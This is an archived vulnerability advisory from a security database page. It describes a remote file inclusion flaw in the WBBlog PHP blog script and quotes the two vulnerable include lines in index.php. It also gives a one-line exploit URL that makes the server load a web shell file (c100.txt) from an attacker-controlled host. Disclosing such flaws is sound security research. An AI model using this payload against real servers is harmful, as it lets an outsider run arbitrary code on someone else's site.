Lucene search
K

WBBlog Remote File Inclusion

🗓️ 13 Dec 2009 00:00:00Reported by mr_meType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

WBBlog Remote File Inclusion Vulnerability, mr_me, Linux, educational purpose

Code
`  
view source  
print?  
#################################################################  
#  
# WBBlog Remote File Inclusion Vulnerability  
# Found By: mr_me  
# Download: http://liqua.com/post/WBBlog.html  
# Tested On: Linux  
# Note: For educational purposes only  
#  
#################################################################  
  
Remote file include in index.php on lines 25 and 26  
  
8<-------------------------------------snip-------------------------------------8<  
  
include($_SERVER['DOCUMENT_ROOT'].'/wbblog/inc/config.inc.php');  
include($_SERVER['DOCUMENT_ROOT'].'/wbblog/inc/init.inc.php');  
  
8<-------------------------------------snip-------------------------------------8<  
  
exploit:  
  
http://[server]/wbblog/index.php?_SERVER[DOCUMENT_ROOT]=http://[evil server]/c100.txt?  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Dec 2009 00:00Current
7.4High risk
Vulners AI Score7.4
17